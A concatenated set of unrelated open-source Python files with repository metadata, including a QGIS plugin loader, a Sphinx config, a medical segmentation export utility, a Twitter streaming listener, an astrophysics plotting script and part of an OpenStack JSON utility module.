'POGOProtos.Settings.Master.ItemSettings_pb2' # @@protoc_insertion_point(class_scope:POGOProtos.Settings.Master.ItemSettings) )) _sym_db.RegisterMessage(ItemSettings) # @@protoc_insertion_point(module_scope)
5b72718447dbd4f8681995d28894495e837162ec
e6ff97a6d68bc115ea72dd515b84266741f9ea8f
/MED/__init__.py
1905cc9a6cce245b569d665b2f77c412cab09e86
[]
no_license
Elalasota/MED_centrum_miasta
3d23f6a12cf98452fb0233bb3657e66075a915ca
0cfddc190d2fc21e5c4786cd561bd0f63582b115
refs/heads/master
2021-01-09T20:40:43.244977
2016-05-29T15:59:18
2016-05-29T15:59:18
59,951,228
0
0
null
null
null
null
UTF-8
Python
false
false
1,446
py
# -*- coding: utf-8 -*- """ /*************************************************************************** MED A QGIS plugin Wyznaczanie centrum miasta ------------------- begin : 2015-01-18 copyright : (C) 2015 by Ela Lasota email : [email protected] git sha : $Format:%H$ ***************************************************************************/ /*************************************************************************** * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU General Public License as published by * * the Free Software Foundation; either version 2 of the License, or * * (at your option) any later version. * * * ***************************************************************************/ This script initializes the plugin, making it known to QGIS. """ # noinspection PyPep8Naming def classFactory(iface): # pylint: disable=invalid-name """Load MED class from file MED. :param iface: A QGIS interface instance. :type iface: QgsInterface """ # from .MED import MED return MED(iface)
5208b205cc65d2ed82f647b36279db82db70b513
5005140cc0c9a2247c3cfcc2bfa12d19472f6a9c
/doc/conf.py
026db6e72d4714ea7f2753238a5c9427aaa28b69
[ "WTFPL" ]
permissive
cristoper/feedmixer
07a1cbb116eca1189c1e917f8a08ab17cdc44059
70bb0da59ad2a9869ff007f703eda3cafe8dcaaa
refs/heads/master
2023-08-08T03:04:49.504375
2023-07-25T23:13:09
2023-07-25T23:13:09
88,230,593
124
12
WTFPL
2023-07-25T23:13:10
2017-04-14T03:45:38
Python
UTF-8
Python
false
false
4,909
py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # feedmixer documentation build configuration file, created by # sphinx-quickstart on Thu Apr 13 15:29:09 2017. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. # import os import sys sys.path.insert(0, os.path.abspath('..')) # -- General configuration ------------------------------------------------ # If your documentation needs a minimal Sphinx version, state it here. # # needs_sphinx = '1.0' autoclass_content = 'both' autodoc_member_order = 'bysource' default_role = 'any' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode', 'sphinx.ext.napoleon', 'sphinx_autodoc_annotation'] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # # source_suffix = ['.rst', '.md'] source_suffix = '.rst' # The master toctree document. master_doc = 'index' # General information about the project. project = 'feedmixer' copyright = '2017, chris b' author = 'chris b' # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = '1.0.0' # The full version, including alpha/beta/rc tags. release = '1.0.0' # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This patterns also effect to html_static_path and html_extra_path exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store'] # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # If true, `todo` and `todoList` produce output, else they produce nothing. todo_include_todos = False # -- Options for HTML output ---------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. # html_theme = 'alabaster' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. # # html_theme_options = {} # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # -- Options for HTMLHelp output ------------------------------------------ # Output file base name for HTML help builder. htmlhelp_basename = 'feedmixerdoc' # -- Options for LaTeX output --------------------------------------------- latex_elements = { # The paper size ('letterpaper' or 'a4paper'). # # 'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). # # 'pointsize': '10pt', # Additional stuff for the LaTeX preamble. # # 'preamble': '', # Latex figure (float) alignment # # 'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ (master_doc, 'feedmixer.tex', 'feedmixer Documentation', 'chris b', 'manual'), ] # -- Options for manual page output --------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ (master_doc, 'feedmixer', 'feedmixer Documentation', [author], 1) ] # -- Options for Texinfo output ------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ (master_doc, 'feedmixer', 'feedmixer Documentation', author, 'feedmixer', 'One line description of project.', 'Miscellaneous'), ]
1954e1d277622077bd20c0d616dc58a3d5b3662f
0bd7a6bef178bb93b2c3fb19e789c7e3b364e6d1
/simple_frame/inference/segmentation_export.py
ea4b06435005677303a2da54ba9827504d7de7c2
[]
no_license
Magnety/Simple_Frame_linux
090e07491e170314718c9ba5f2da2a4393bdb1ad
7e1ef5d11e3baa8784fd9b6bbf81b0d954dd1ca6
refs/heads/main
2023-06-02T09:35:36.023461
2021-06-17T09:23:01
2021-06-17T09:23:01
371,412,450
0
0
null
null
null
null
UTF-8
Python
false
false
11,716
py
# Copyright 2020 Division of Medical Image Computing, German Cancer Research Center (DKFZ), Heidelberg, Germany # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import sys from copy import deepcopy from typing import Union, Tuple import numpy as np import SimpleITK as sitk from batchgenerators.augmentations.utils import resize_segmentation from simple_frame.preprocessing.preprocessing import get_lowres_axis, get_do_separate_z, resample_data_or_seg from batchgenerators.utilities.file_and_folder_operations import * def save_segmentation_nifti_from_softmax(segmentation_softmax: Union[str, np.ndarray], out_fname: str, properties_dict: dict, order: int = 1, region_class_order: Tuple[Tuple[int]] = None, seg_postprogess_fn: callable = None, seg_postprocess_args: tuple = None, resampled_npz_fname: str = None, non_postprocessed_fname: str = None, force_separate_z: bool = None, interpolation_order_z: int = 0, verbose: bool = True): """ This is a utility for writing segmentations to nifto and npz. It requires the data to have been preprocessed by GenericPreprocessor because it depends on the property dictionary output (dct) to know the geometry of the original data. segmentation_softmax does not have to have the same size in pixels as the original data, it will be resampled to match that. This is generally useful because the spacings our networks operate on are most of the time not the native spacings of the image data. If seg_postprogess_fn is not None then seg_postprogess_fnseg_postprogess_fn(segmentation, *seg_postprocess_args) will be called before nifto export There is a problem with python process communication that prevents us from communicating obejcts larger than 2 GB between processes (basically when the length of the pickle string that will be sent is communicated by the multiprocessing.Pipe object then the placeholder (\%i I think) does not allow for long enough strings (lol). This could be fixed by changing i to l (for long) but that would require manually patching system python code.) We circumvent that problem here by saving softmax_pred to a npy file that will then be read (and finally deleted) by the Process. save_segmentation_nifti_from_softmax can take either filename or np.ndarray for segmentation_softmax and will handle this automatically :param segmentation_softmax: :param out_fname: :param properties_dict: :param order: :param region_class_order: :param seg_postprogess_fn: :param seg_postprocess_args: :param resampled_npz_fname: :param non_postprocessed_fname: :param force_separate_z: if None then we dynamically decide how to resample along z, if True/False then always /never resample along z separately. Do not touch unless you know what you are doing :param interpolation_order_z: if separate z resampling is done then this is the order for resampling in z :param verbose: :return: """ if verbose: print("force_separate_z:", force_separate_z, "interpolation order:", order) if isinstance(segmentation_softmax, str): assert isfile(segmentation_softmax), "If isinstance(segmentation_softmax, str) then " \ "isfile(segmentation_softmax) must be True" del_file = deepcopy(segmentation_softmax) segmentation_softmax = np.load(segmentation_softmax) os.remove(del_file) # first resample, then put result into bbox of cropping, then save current_shape = segmentation_softmax.shape shape_original_after_cropping = properties_dict.get('size_after_cropping') shape_original_before_cropping = properties_dict.get('original_size_of_raw_data') # current_spacing = dct.get('spacing_after_resampling') # original_spacing = dct.get('original_spacing') if np.any([i != j for i, j in zip(np.array(current_shape[1:]), np.array(shape_original_after_cropping))]): if force_separate_z is None: if get_do_separate_z(properties_dict.get('original_spacing')): do_separate_z = True lowres_axis = get_lowres_axis(properties_dict.get('original_spacing')) elif get_do_separate_z(properties_dict.get('spacing_after_resampling')): do_separate_z = True lowres_axis = get_lowres_axis(properties_dict.get('spacing_after_resampling')) else: do_separate_z = False lowres_axis = None else: do_separate_z = force_separate_z if do_separate_z: lowres_axis = get_lowres_axis(properties_dict.get('original_spacing')) else: lowres_axis = None if verbose: print("separate z:", do_separate_z, "lowres axis", lowres_axis) seg_old_spacing = resample_data_or_seg(segmentation_softmax, shape_original_after_cropping, is_seg=False, axis=lowres_axis, order=order, do_separate_z=do_separate_z, cval=0, order_z=interpolation_order_z) # seg_old_spacing = resize_softmax_output(segmentation_softmax, shape_original_after_cropping, order=order) else: if verbose: print("no resampling necessary") seg_old_spacing = segmentation_softmax if resampled_npz_fname is not None: np.savez_compressed(resampled_npz_fname, softmax=seg_old_spacing.astype(np.float16)) # this is needed for ensembling if the nonlinearity is sigmoid if region_class_order is not None: properties_dict['regions_class_order'] = region_class_order save_pickle(properties_dict, resampled_npz_fname[:-4] + ".pkl") if region_class_order is None: seg_old_spacing = seg_old_spacing.argmax(0) else: seg_old_spacing_final = np.zeros(seg_old_spacing.shape[1:]) for i, c in enumerate(region_class_order): seg_old_spacing_final[seg_old_spacing[i] > 0.5] = c seg_old_spacing = seg_old_spacing_final bbox = properties_dict.get('crop_bbox') if bbox is not None: seg_old_size = np.zeros(shape_original_before_cropping) for c in range(3): bbox[c][1] = np.min((bbox[c][0] + seg_old_spacing.shape[c], shape_original_before_cropping[c])) seg_old_size[bbox[0][0]:bbox[0][1], bbox[1][0]:bbox[1][1], bbox[2][0]:bbox[2][1]] = seg_old_spacing else: seg_old_size = seg_old_spacing if seg_postprogess_fn is not None: seg_old_size_postprocessed = seg_postprogess_fn(np.copy(seg_old_size), *seg_postprocess_args) else: seg_old_size_postprocessed = seg_old_size seg_resized_itk = sitk.GetImageFromArray(seg_old_size_postprocessed.astype(np.uint8)) seg_resized_itk.SetSpacing(properties_dict['itk_spacing']) seg_resized_itk.SetOrigin(properties_dict['itk_origin']) seg_resized_itk.SetDirection(properties_dict['itk_direction']) sitk.WriteImage(seg_resized_itk, out_fname) if (non_postprocessed_fname is not None) and (seg_postprogess_fn is not None): seg_resized_itk = sitk.GetImageFromArray(seg_old_size.astype(np.uint8)) seg_resized_itk.SetSpacing(properties_dict['itk_spacing']) seg_resized_itk.SetOrigin(properties_dict['itk_origin']) seg_resized_itk.SetDirection(properties_dict['itk_direction']) sitk.WriteImage(seg_resized_itk, non_postprocessed_fname) def save_segmentation_nifti(segmentation, out_fname, dct, order=1, force_separate_z=None, order_z=0): """ faster and uses less ram than save_segmentation_nifti_from_softmax, but maybe less precise and also does not support softmax export (which is needed for ensembling). So it's a niche function that may be useful in some cases. :param segmentation: :param out_fname: :param dct: :param order: :param force_separate_z: :return: """ # suppress output print("force_separate_z:", force_separate_z, "interpolation order:", order) sys.stdout = open(os.devnull, 'w') if isinstance(segmentation, str): assert isfile(segmentation), "If isinstance(segmentation_softmax, str) then " \ "isfile(segmentation_softmax) must be True" del_file = deepcopy(segmentation) segmentation = np.load(segmentation) os.remove(del_file) # first resample, then put result into bbox of cropping, then save current_shape = segmentation.shape shape_original_after_cropping = dct.get('size_after_cropping') shape_original_before_cropping = dct.get('original_size_of_raw_data') # current_spacing = dct.get('spacing_after_resampling') # original_spacing = dct.get('original_spacing') if np.any(np.array(current_shape) != np.array(shape_original_after_cropping)): if order == 0: seg_old_spacing = resize_segmentation(segmentation, shape_original_after_cropping, 0, 0) else: if force_separate_z is None: if get_do_separate_z(dct.get('original_spacing')): do_separate_z = True lowres_axis = get_lowres_axis(dct.get('original_spacing')) elif get_do_separate_z(dct.get('spacing_after_resampling')): do_separate_z = True lowres_axis = get_lowres_axis(dct.get('spacing_after_resampling')) else: do_separate_z = False lowres_axis = None else: do_separate_z = force_separate_z if do_separate_z: lowres_axis = get_lowres_axis(dct.get('original_spacing')) else: lowres_axis = None print("separate z:", do_separate_z, "lowres axis", lowres_axis) seg_old_spacing = resample_data_or_seg(segmentation[None], shape_original_after_cropping, is_seg=True, axis=lowres_axis, order=order, do_separate_z=do_separate_z, cval=0, order_z=order_z)[0] else: seg_old_spacing = segmentation bbox = dct.get('crop_bbox') if bbox is not None: seg_old_size = np.zeros(shape_original_before_cropping) for c in range(3): bbox[c][1] = np.min((bbox[c][0] + seg_old_spacing.shape[c], shape_original_before_cropping[c])) seg_old_size[bbox[0][0]:bbox[0][1], bbox[1][0]:bbox[1][1], bbox[2][0]:bbox[2][1]] = seg_old_spacing else: seg_old_size = seg_old_spacing seg_resized_itk = sitk.GetImageFromArray(seg_old_size.astype(np.uint8)) seg_resized_itk.SetSpacing(dct['itk_spacing']) seg_resized_itk.SetOrigin(dct['itk_origin']) seg_resized_itk.SetDirection(dct['itk_direction']) sitk.WriteImage(seg_resized_itk, out_fname) sys.stdout = sys.__stdout__
f56f9bcaa5d9294fc2f4329958f2a02d6b674c23
4503a3bfd940dce760b5f70e90e6fe2fe0cc4881
/week02/lectures/FirstCode.py
9d2c8a972ddc17efc1eafc379c1a682a399067d9
[]
no_license
RicardoLima17/lecture
dba7de5c61507f51d51e3abc5c7c4c22ecda504f
b41f1201ab938fe0cab85566998390166c7fa7d8
refs/heads/main
2023-04-18T11:12:39.769760
2021-04-21T18:36:09
2021-04-21T18:36:09
334,456,464
0
0
null
null
null
null
UTF-8
Python
false
false
103
py
# Programn that greets the user # Author: Ricardo Rodrigues print('Hello world! \nHow are you today')
790996181720155a34d4c398ecf0c34c1975d7fa
d53b659594941babb0ac33d18929f63cb7808cce
/python/test/twitter_streaming.py
b6d8bd6d30c5bac2e68c239244d15ca3d43c4bee
[ "Apache-2.0" ]
permissive
brianmunson/MapperTwitter
479473307444c0eb1e01dfb66f59fcf143d56735
b47b8aa50ebe34a4263b2e47ccef47ea83266d14
refs/heads/master
2021-01-11T23:09:10.158012
2017-03-14T22:57:41
2017-03-14T22:57:41
78,553,738
0
0
null
null
null
null
UTF-8
Python
false
false
2,002
py
# twitter streaming listener # modified from adilmoujahid.com import tweepy as ty from tweepy.streaming import StreamListener from tweepy import OAuthHandler from tweepy import StreamListener import os from dotenv import load_dotenv, find_dotenv load_dotenv(find_dotenv()) consumer_key = os.environ.get("TW_CONSUMER") consumer_secret = os.environ.get("TW_CONSUMER_SECRET") access_token = os.environ.get("TW_ACCESS") access_token_secret = os.environ.get("TW_ACCESS_SECRET") auth = ty.OAuthHandler(consumer_key, consumer_secret) auth.set_access_token(access_token, access_token_secret) # class StdOutListener(StreamListener): # def on_data(self, data): # try: # print(data) # except: # pass #ignore printing errors to console # return True # def on_error(self, status): # print("Error with code: %s", status) # return True # def on_timeout(self): # print("Timeout...") # return True class StdOutListener(StreamListener): def __init__(self, api=None): super(StdOutListener, self).__init__() self.num_tweets = 0 def on_data(self, data): if self.num_tweets < 10000: try: print(data) self.num_tweets += 1 return True except: pass return True def on_error(self, status): print("Error with code: %s", status) return True def on_timeout(self): print("Timeout...") return True if __name__ == '__main__': l = StdOutListener() stream = ty.Stream(auth, l) stream.filter(track=["InternetFriendsDay", "GalentinesDay"]) # stream.filter(track=["string1", "string2"]) # filters to track by string1, string2. can enter a longer list as well. # stop program with Ctrl-C # to run, from command line: python file_name.py > twitter_data.text # here file_name is the name of the file containing this listener
fe271efef176ea856a983857fd44e6e559a41b2f
bf19f11f6e6626fa71550b9f2da72847f9db40f9
/tutorials/class_14/apps.py
72f8fa0f3b203b23675ce3861b0c6cedeb4d25de
[ "Apache-2.0" ]
permissive
MeGustas-5427/SQL_Tutorials
b6caa6a325b423312e18949e88e5751883d21ac8
627372c2d5d8656d72645830c9a1fae1df278fc7
refs/heads/master
2023-04-06T10:19:53.022223
2021-03-20T13:20:50
2021-03-20T13:20:50
310,186,237
13
2
null
2021-01-14T02:34:57
2020-11-05T04:03:42
Python
UTF-8
Python
false
false
100
py
from django.apps import AppConfig class Class14Config(AppConfig): name = 'tutorials.class_14'
39ea59b534f5e9b9fe9597d3cb0a435cf20a1224
29fb2eb3b9bb21b529e814da53518fab2958693a
/thesis/images/ionizationStructure.py
bab29ae268d132cad0aaf36517a5e29f94941e0a
[]
no_license
Vital-Fernandez/thesis_pipeline
acca734b1a2ce11b0bee5bd41fab534022ea295e
1253e2ed94e0f502a16cae6b88f84b633d0f16c2
refs/heads/master
2022-05-31T10:15:47.241645
2021-05-18T17:43:44
2021-05-18T17:43:44
90,319,650
0
0
null
null
null
null
UTF-8
Python
false
false
9,922
py
from dazer_methods import Dazer from numpy import nanmean, nanstd, mean, nan as np_nan from uncertainties import ufloat, unumpy, umath import pandas as pd # Generate dazer object dz = Dazer() # Declare figure format size_dict = {'figure.figsize': (14, 6), 'axes.labelsize': 20, 'legend.fontsize': 20, 'font.family': 'Times New Roman', 'mathtext.default': 'regular', 'xtick.labelsize': 20, 'ytick.labelsize': 20} dz.FigConf(plotSize=size_dict) # Declare data location folder_data = '/home/vital/Dropbox/Astrophysics/Seminars/Cloudy School 2017/teporingos/Grid_data_vital/' file_name_list_S = ['TGrid_Mass100000.0_age5.48_zStar-2.1_zGas0.008.ele_S', 'TGrid_Mass200000.0_age5.48_zStar-2.1_zGas0.008.ele_S'] file_name_list_O = ['TGrid_Mass100000.0_age5.48_zStar-2.1_zGas0.008.ele_O', 'TGrid_Mass200000.0_age5.48_zStar-2.1_zGas0.008.ele_O'] z_list = ['100000', '200000'] ions_list_S = ['S+', 'S+2', 'S+3'] ions_labels_S = [r'$S^{+}$', r'$S^{2+}$', r'$S^{3+}$'] ions_list_O = ['O+', 'O+2'] ions_labels_O = [r'$O^{+}$', r'$O^{2+}$'] labels_coords_S = [[(1.60e18, 0.98), (2.35e18, 0.98)], [(1.0e18, 0.72), (1.77e18, 0.72)], [(0.75e18, 0.000005), (2.0e18, 0.015)]] labels_coords_O = [[(1.55e18, 0.5), (2.3e18, 0.5)], [(1.03e18, 0.6), (1.8e18, 0.6)]] # Generate the color map dz.gen_colorList(0, 5) # ions_colors_S = [dz.get_color(0), dz.get_color(1), dz.get_color(2)] # ions_colors_O = [dz.get_color(3), dz.get_color(4)] ions_colors_S = ['tab:orange', 'tab:red', 'tab:brown'] ions_colors_O = ['tab:blue', 'tab:green'] line_type = ['--', '-'] for i in range(len(file_name_list_S)): file_name = file_name_list_S[i] elemIon_df = pd.read_csv(folder_data + file_name, sep='\t') for j in range(len(ions_list_S)): ion = ions_list_S[j] radious = elemIon_df['#depth'].values ion_frac = elemIon_df[ion].values label = r'{0:1.1e} $M_\odot$'.format(float(z_list[i])) dz.data_plot(radious / 1e19, ion_frac, color=ions_colors_S[j], linestyle=line_type[i], label=r'Cluster mass {}'.format(label), linewidth=2) dz.plot_text(labels_coords_S[j][i][0] / 1e19, labels_coords_S[j][i][1], text=ions_labels_S[j], color=ions_colors_S[j], fontsize=20, axis_plot=None) file_name = file_name_list_O[i] elemIon_df = pd.read_csv(folder_data + file_name, sep='\t') for j in range(len(ions_list_O)): ion = ions_list_O[j] radious = elemIon_df['#depth'].values ion_frac = elemIon_df[ion].values label = r'{0:1.1e} $M_\odot$'.format(float(z_list[i])) dz.data_plot(radious / 1e19, ion_frac, color=ions_colors_O[j], linestyle=line_type[i], label=r'Cluster mass {}'.format(label)) dz.plot_text(labels_coords_O[j][i][0] / 1e19, labels_coords_O[j][i][1], text=ions_labels_O[j], color=ions_colors_O[j], fontsize=20, axis_plot=None) dz.FigWording(r'$R_{19}$ $(10^{19}cm)$', r'$X(A^{+i})$', '', ncols_leg=1) leg = dz.Axis.get_legend() leg.legendHandles[0].set_color('black') leg.legendHandles[1].set_color('black') # dz.display_fig() dz.display_fig() # dz.savefig('/home/vital/Dropbox/Astrophysics/Papers/Yp_AlternativeMethods/images/SulfurIonization_fraction_vs_cloudThickness') # dz.savefig('/home/vital/Dropbox/Astrophysics/Seminars/Stasinska conference/SulfurIonization_fraction_vs_cloudThickness') # #Load catalogue dataframe # catalogue_dict = dz.import_catalogue() # catalogue_df = dz.load_excel_DF('/home/vital/Dropbox/Astrophysics/Data/WHT_observations/WHT_Galaxies_properties.xlsx') # # #Define plot frame and colors # size_dict = {'axes.labelsize':24, 'legend.fontsize':24, 'font.family':'Times New Roman', 'mathtext.default':'regular', 'xtick.labelsize':22, 'ytick.labelsize':22} # dz.FigConf(plotSize = size_dict) # # dz.quick_indexing(catalogue_df) # idcs = (pd.notnull(catalogue_df.OI_HI_emis2nd)) & (pd.notnull(catalogue_df.NI_HI_emis2nd)) & (pd.notnull(catalogue_df.HeII_HII_from_O_emis2nd)) & (catalogue_df.quick_index.notnull()) & (~catalogue_df.index.isin(['SHOC593'])) # # #Prepare data # O_values = catalogue_df.loc[idcs].OI_HI_emis2nd.values # N_values = catalogue_df.loc[idcs].NI_HI_emis2nd.values # HeII_HI = catalogue_df.loc[idcs].HeII_HII_from_O_emis2nd.values # objects = catalogue_df.loc[idcs].quick_index.values # # N_O_ratio = N_values/O_values # # dz.data_plot(unumpy.nominal_values(HeII_HI), unumpy.nominal_values(N_O_ratio), label = '', markerstyle='o', x_error=unumpy.std_devs(HeII_HI), y_error=unumpy.std_devs(N_O_ratio)) # dz.plot_text(unumpy.nominal_values(HeII_HI), unumpy.nominal_values(N_O_ratio), text=objects, x_pad=1.005, y_pad=1.01) # # dz.FigWording(r'y', r'$N/O$', '') # # dz.display_fig() # dz.savefig('/home/vital/Dropbox/Astrophysics/Papers/Yp_AlternativeMethods/images/NO_to_y') # from dazer_methods import Dazer # from numpy import nanmean, nanstd, mean, nan as np_nan # from uncertainties import ufloat, unumpy, umath # import pandas as pd # # # Generate dazer object # dz = Dazer() # # # Declare figure format # size_dict = {'figure.figsize': (10, 10), 'axes.labelsize': 24, 'legend.fontsize': 14, 'font.family': 'Times New Roman', # 'mathtext.default': 'regular', 'xtick.labelsize': 22, 'ytick.labelsize': 22} # dz.FigConf(plotSize=size_dict) # # # Declare data location # folder_data = '/home/vital/Dropbox/Astrophysics/Seminars/Cloudy School 2017/teporingos/Grid_data_vital/' # file_name_list_S = [ # 'TGrid_Mass100000.0_age5.48_zStar-2.1_zGas0.008.ele_S'] # , 'TGrid_Mass100000.0_age5.48_zStar-2.1_zGas0.008.ele_S'] # file_name_list_O = [ # 'TGrid_Mass100000.0_age5.48_zStar-2.1_zGas0.008.ele_O'] # , 'TGrid_Mass100000.0_age5.48_zStar-2.1_zGas0.008.ele_O'] # z_list = ['200000', '100000'] # ions_list_S = ['S+', 'S+2', 'S+3'] # ions_labels_S = [r'$S^{+}$', r'$S^{2+}$', r'$S^{3+}$'] # ions_list_O = ['O+', 'O+2'] # ions_labels_O = [r'$O^{+}$', r'$O^{2+}$'] # labels_coords_S = [[(1.65e18, 1.0), # (2.4e18, 1.0)], # [(1.0e18, 0.75), # (1.77e18, 0.75)], # [(1.2e18, 0.015), # (2.0e18, 0.015)]] # labels_coords_O = [[(1.55e18, 0.5), # (2.3e18, 0.5)], # [(1.03e18, 0.6), # (1.8e18, 0.6)]] # ions_colors_S = ['tab:orange', 'tab:red', 'tab:brown'] # ions_colors_O = ['tab:blue', 'tab:green'] # # line_type = ['-', '--'] # # for i in range(len(file_name_list_S)): # # file_name = file_name_list_S[i] # # elemIon_df = pd.read_csv(folder_data + file_name, sep='\t') # # for j in range(len(ions_list_S)): # ion = ions_list_S[j] # radious = elemIon_df['#depth'].values # ion_frac = elemIon_df[ion].values # label = r'{0:1.1e} $M_\odot$'.format(float(z_list[i])) # dz.data_plot(radious / 1e19, ion_frac, color=ions_colors_S[j], linestyle=line_type[i], # label=r'Cluster mass {}'.format(label), linewidth=3) # dz.plot_text(labels_coords_S[j][i][0] / 1e19, labels_coords_S[j][i][1], text=ions_labels_S[j], # color=ions_colors_S[j], fontsize=17, axis_plot=None) # # file_name = file_name_list_O[i] # # elemIon_df = pd.read_csv(folder_data + file_name, sep='\t') # # for j in range(len(ions_list_O)): # ion = ions_list_O[j] # radious = elemIon_df['#depth'].values # ion_frac = elemIon_df[ion].values # label = r'{0:1.1e} $M_\odot$'.format(float(z_list[i])) # dz.data_plot(radious / 1e19, ion_frac, color=ions_colors_O[j], linestyle=line_type[i], # label=r'Cluster mass {}'.format(label)) # dz.plot_text(labels_coords_O[j][i][0] / 1e19, labels_coords_O[j][i][1], text=ions_labels_O[j], # color=ions_colors_O[j], fontsize=17, axis_plot=None) # # dz.FigWording(r'$R_{19}$ $(10^{19}cm)$', r'$X(A^{+i})$', '', ncols_leg=1) # # leg = dz.Axis.get_legend() # leg.legendHandles[0].set_color('black') # # leg.legendHandles[1].set_color('black') # # # dz.display_fig() # # dz.savefig('/home/vital/Dropbox/Astrophysics/Papers/Yp_AlternativeMethods/images/SulfurIonization_fraction_vs_cloudThickness') # dz.savefig('/home/vital/Dropbox/Astrophysics/Seminars/Stasinska conference/SulfurIonization_fraction_vs_cloudThickness') # # # #Load catalogue dataframe # # catalogue_dict = dz.import_catalogue() # # catalogue_df = dz.load_excel_DF('/home/vital/Dropbox/Astrophysics/Data/WHT_observations/WHT_Galaxies_properties.xlsx') # # # # #Define plot frame and colors # # size_dict = {'axes.labelsize':24, 'legend.fontsize':24, 'font.family':'Times New Roman', 'mathtext.default':'regular', 'xtick.labelsize':22, 'ytick.labelsize':22} # # dz.FigConf(plotSize = size_dict) # # # # dz.quick_indexing(catalogue_df) # # idcs = (pd.notnull(catalogue_df.OI_HI_emis2nd)) & (pd.notnull(catalogue_df.NI_HI_emis2nd)) & (pd.notnull(catalogue_df.HeII_HII_from_O_emis2nd)) & (catalogue_df.quick_index.notnull()) & (~catalogue_df.index.isin(['SHOC593'])) # # # # #Prepare data # # O_values = catalogue_df.loc[idcs].OI_HI_emis2nd.values # # N_values = catalogue_df.loc[idcs].NI_HI_emis2nd.values # # HeII_HI = catalogue_df.loc[idcs].HeII_HII_from_O_emis2nd.values # # objects = catalogue_df.loc[idcs].quick_index.values # # # # N_O_ratio = N_values/O_values # # # # dz.data_plot(unumpy.nominal_values(HeII_HI), unumpy.nominal_values(N_O_ratio), label = '', markerstyle='o', x_error=unumpy.std_devs(HeII_HI), y_error=unumpy.std_devs(N_O_ratio)) # # dz.plot_text(unumpy.nominal_values(HeII_HI), unumpy.nominal_values(N_O_ratio), text=objects, x_pad=1.005, y_pad=1.01) # # # # dz.FigWording(r'y', r'$N/O$', '') # # # dz.display_fig() # # dz.savefig('/home/vital/Dropbox/Astrophysics/Papers/Yp_AlternativeMethods/images/NO_to_y')
ec2e2f1225cf3c27c122d9403076f857e991253f
1b3613f17af551ae1023be03a78619fbf622a619
/vmthunder/openstack/common/jsonutils.py
662c79aae2e725e44c88fa37d4c622931c8ae778
[ "Apache-2.0" ]
permissive
licyh/VMThunder
c2e9e45b1cb7263e6b23a631d2a16494265ba758
5daa10d1a78c52df2a5233c8f54823ac17cc7b06
refs/heads/master
2021-01-22T12:17:11.478468
2014-10-16T03:53:45
2014-10-16T03:53:45
null
0
0
null
null
null
null
UTF-8
Python
false
false
6,489
py
# Copyright 2010 United States Government as represented by the # Administrator of the National Aeronautics and Space Administration. # Copyright 2011 Justin Santa Barbara # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. ''' JSON related utilities. This module provides a few things: 1) A handy function for getting an object down to something that can be JSON serialized. See to_primitive(). 2) Wrappers around loads() and dumps(). The dumps() wrapper will automatically use to_primitive() for you if needed. 3) This sets up anyjson to use the loads() and dumps() wrappers if anyjson is available. ''' import datetime import functools import inspect import itertools import json import six import six.moves.xmlrpc_client as xmlrpclib from vmthunder.openstack.common import gettextutils from vmthunder.openstack.common import importutils from vmthunder.openstack.common import timeutils netaddr = importutils.try_import("netaddr") _nasty_type_tests = [inspect.ismodule, inspect.isclass, inspect.ismethod, inspect.isfunction, inspect.isgeneratorfunction, inspect.isgenerator, inspect.istraceback, inspect.isframe, inspect.iscode, inspect.isbuiltin, inspect.isroutine, inspect.isabstract] _simple_types = (six.string_types + six.integer_types + (type(None), bool, float)) def to_primitive(value, convert_instances=False, convert_datetime=True, level=0, max_depth=3): """Convert a complex object into primitives. Handy for JSON serialization. We can optionally handle instances, but since this is a recursive function, we could have cyclical data structures. To handle cyclical data structures we could track the actual objects visited in a set, but not all objects are hashable. Instead we just track the depth of the object inspections and don't go too deep. Therefore, convert_instances=True is lossy ... be aware. """ # handle obvious types first - order of basic types determined by running # full tests on nova project, resulting in the following counts: # 572754 <type 'NoneType'> # 460353 <type 'int'> # 379632 <type 'unicode'> # 274610 <type 'str'> # 199918 <type 'dict'> # 114200 <type 'datetime.datetime'> # 51817 <type 'bool'> # 26164 <type 'list'> # 6491 <type 